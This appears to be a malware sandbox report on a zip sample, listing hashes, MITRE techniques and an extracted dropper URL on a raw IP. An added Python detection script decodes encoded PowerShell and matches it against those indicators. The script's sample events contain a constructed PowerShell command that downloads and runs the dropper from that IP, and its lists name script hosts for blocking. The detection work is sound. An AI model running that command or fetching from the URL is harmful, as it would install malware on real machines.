General

  • Target

    8488276877.zip

  • Size

    21KB

  • Sample

    221124-p21c4shd81

  • MD5

    ea32ce9a3bd7befb0ba0644fdb5cbc62

  • SHA1

    67d2da97b71882d62a35590589725ed1dd52ab12

  • SHA256

    38c01d803a9f1661e967026991ef6cade30ee75b2fcfb3dc8d7e3c72f3d19378

  • SHA512

    371f87018ac28396df60576ccd1530ee56780d4a1b2d15e307ad8a54b6660bedef3501d5a95752246c51878327c1adbb3d865d465a6563b6198e868992dd76f6

  • SSDEEP

    384:F4oaiga0m1qbiE4zRy5i00Mk1fq9UuydRRA6kqM6YHtvxJZ9sxVieN4M:F3aL4QiRywWk1fBuy/2TZJZQQeiM

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    exe.dropper  http://72.167.223.219/MSDriverLoader.exe

Targets

    • Target

      03700e0d02a6a1d76ecaa4d8307e40f76e07284646b3c45693054996f2e643d7

    • Size

      24KB

    • MD5

      3e8ee32c4a5c24dbfe4e3ded8b8dc9e5

    • SHA1

      23d75638b70178df3c0fa6df8879d819dab2037d

    • SHA256

      03700e0d02a6a1d76ecaa4d8307e40f76e07284646b3c45693054996f2e643d7

    • SHA512

      199e4a39c8642c1ec7f508cbe7f14104e258352067486d43de8c14d7a82e9a9f6352576e9078c14faa5a37bba3ee8d4ab2a454be132750931b5f90c4524fecc9

    • SSDEEP

      384:EtJBybZuEU0m3jl1JPxyPqK56i7Df1uhxGGoetIUt8cpL4MxTTXBvk2Gf6BEspaQ:NbZFpwhWDfIh9jtIS4MxTN8ViBPL

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request
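
The two signatures above (a parent spawning an unexpected child, and a blocklisted process making a network request), together with the dropper URL in the extracted config, are what an analyst would turn into a detection. The Python below is an added example, not part of the sandbox report and not any vendor's code: it runs a small rule set over constructed process-creation and network-connection events, decodes a PowerShell -EncodedCommand payload (the sort of thing the report's "Deobfuscated" field holds), and matches what it finds against the IOCs printed on this page. The parent/child process lists, the network blocklist, the event layout and the sample events are assumptions made for the example; only the URL and hashes come from the report.

```python
"""Toy detection pass modelled on the two Triage signatures for this sample.
Added example: IOC values are copied from the report page; the rule lists,
event schema and sample telemetry are constructed assumptions."""
import base64
import re
from urllib.parse import urlparse

# IOCs taken from the report page.
DROPPER_URL = "http://72.167.223.219/MSDriverLoader.exe"
DROPPER_HOST = urlparse(DROPPER_URL).hostname
KNOWN_SHA256 = {
    "38c01d803a9f1661e967026991ef6cade30ee75b2fcfb3dc8d7e3c72f3d19378",  # 8488276877.zip
    "03700e0d02a6a1d76ecaa4d8307e40f76e07284646b3c45693054996f2e643d7",  # 24KB inner target
}

# Assumption: parents that should never launch a script host or shell
# (Office and an archiver; compromise via macro or exploit is the usual cause).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "7zfm.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumption: processes that should not originate outbound connections here.
NETWORK_BLOCKLIST = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe"}

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the usual spellings.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def visible_script(cmdline):
    """Command line plus any -EncodedCommand payload decoded (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not a real encoded command; keep the raw line


def check_process_event(ev):
    findings = []
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    if parent in SUSPICIOUS_PARENTS and child in SCRIPT_HOSTS:
        findings.append(("unexpected_child_process", f"{parent} -> {child}"))
    for url in URL_RE.findall(visible_script(ev.get("command_line", ""))):
        if url.lower() == DROPPER_URL.lower():
            findings.append(("known_dropper_url", url))
    if ev.get("sha256", "").lower() in KNOWN_SHA256:
        findings.append(("known_sample_hash", ev["sha256"].lower()))
    return findings


def check_network_event(ev):
    findings = []
    proc = basename(ev["image"])
    if proc in NETWORK_BLOCKLIST:
        findings.append(("blocklisted_process_network", f"{proc} -> {ev['dest_ip']}:{ev['dest_port']}"))
    if ev["dest_ip"] == DROPPER_HOST:
        findings.append(("known_dropper_host", ev["dest_ip"]))
    return findings


def scan(events):
    """Return (event id, rule name, detail) triples for every rule hit."""
    out = []
    for ev in events:
        hits = check_process_event(ev) if ev["type"] == "process" else check_network_event(ev)
        out.extend((ev["id"], name, detail) for name, detail in hits)
    return out


# Constructed sample telemetry (not from the report): a Word document launching
# PowerShell with an encoded command that fetches the dropper, the resulting
# connection, and one benign process start.  The encoding is done here so the
# command line carries the payload the way a real one would.
_SCRIPT = ("(New-Object Net.WebClient).DownloadFile('http://72.167.223.219/MSDriverLoader.exe',"
           "$env:TEMP+'\\MSDriverLoader.exe');Start-Process ($env:TEMP+'\\MSDriverLoader.exe')")
_ENC = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "type": "process",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -NoP -enc {_ENC}", "sha256": ""},
    {"id": 2, "type": "network",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_ip": "72.167.223.219", "dest_port": 80},
    {"id": 3, "type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe readme.txt", "sha256": ""},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The encoded-command decoding is the step worth keeping: a plain regex over the raw command line would never see the URL, which is exactly why the sandbox reports a deobfuscated form separately from the raw script.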

MITRE ATT&CK Matrix (ATT&CK v6)

Defense Evasion

  • Modify Registry (T1112): 1

Discovery

  • Query Registry (T1012): 2

  • System Information Discovery (T1082): 2

Tasks